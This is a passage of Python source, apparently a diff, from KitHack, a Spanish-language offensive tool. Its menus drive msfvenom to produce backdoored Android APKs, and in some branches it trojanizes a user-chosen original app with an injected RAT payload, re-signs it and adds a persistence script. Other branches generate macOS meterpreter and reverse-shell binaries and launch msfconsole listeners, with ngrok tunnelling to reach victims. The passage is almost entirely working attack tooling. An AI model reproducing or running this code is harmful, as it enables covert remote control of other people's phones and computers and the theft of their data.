{2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif pay == '07': - print ('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print ('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) - - a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - a = a.zfill(2) - - if a == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - break - else: - Tk().withdraw() - icon = filedialog.askopenfilename(title = "KITHACK - SELECT ICON PNG",filetypes = (("png files","*.png"),("all files","*.*"))) - print("\n{0}ICON: {1}".format(YELLOW, icon)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - file = open("/tmp/data.txt", "w") - file.write(icon + '\n') - file.write(mainout) - file.close() - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/payload -o output/kithack.apk') - location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/payload output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - # Salida de bucle - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif a == '02': - print ('{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} Use the old Metasploit method'.format(WHITE, YELLOW)) - print ('{0}[02]{1} Use the new KitHack method'.format(WHITE, YELLOW)) - - m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - m = m.zfill(2) - - if m == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif m == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - Tk().withdraw() - APK = filedialog.askopenfilename(title = "KITHACK - SELECT APK ORIGINAL",filetypes = (("apk files","*.apk"),("all files","*.*"))) - print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - var = input("\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print("\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) - location = os.getcwd() - print("{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) - print("\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool d -f -o output/payload output/payload.apk') - print("\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) - print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apktool b output/original -o output/kithack.apk') - if os.path.isfile('output/kithack.apk'): - print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') - time.sleep(4) - os.system('zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) - while var.upper() != "N": - print("\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - ext = mainout + '.apk' - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) - print("{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) - break - print("\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - os.system('rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - else: - print("{}\n[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('clear') - main() - - elif sys == '04': - print ('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print ('{0}[01]{1} osx/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print ('{0}[02]{1} osx/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print ('{0}[03]{1} osx/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[04]{1} osx/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[05]{1} osx/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) - print ('{0}[06]{1} osx/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) - - pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) - pay = pay.zfill(2) - - if pay == '01': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '02': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_https LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '03': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '04': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '05': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x64/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if os.stat('output/{}.macho'.format(mainout)).st_size != 0: - print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') - main() - else: - if not ".tcp.ngrok.io" in LHOST: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD osx/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - else: - print("\n{0}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) - time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) - os.system('systemctl stop postgresql && clear') - main() - - elif pay == '06': - run_network() - LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) - mainout = os.path.splitext(OUT)[0] - print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('systemctl start postgresql && msfvenom -p osx/x86/shell_reverse_tcp LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) - location = os.getcwd() - if 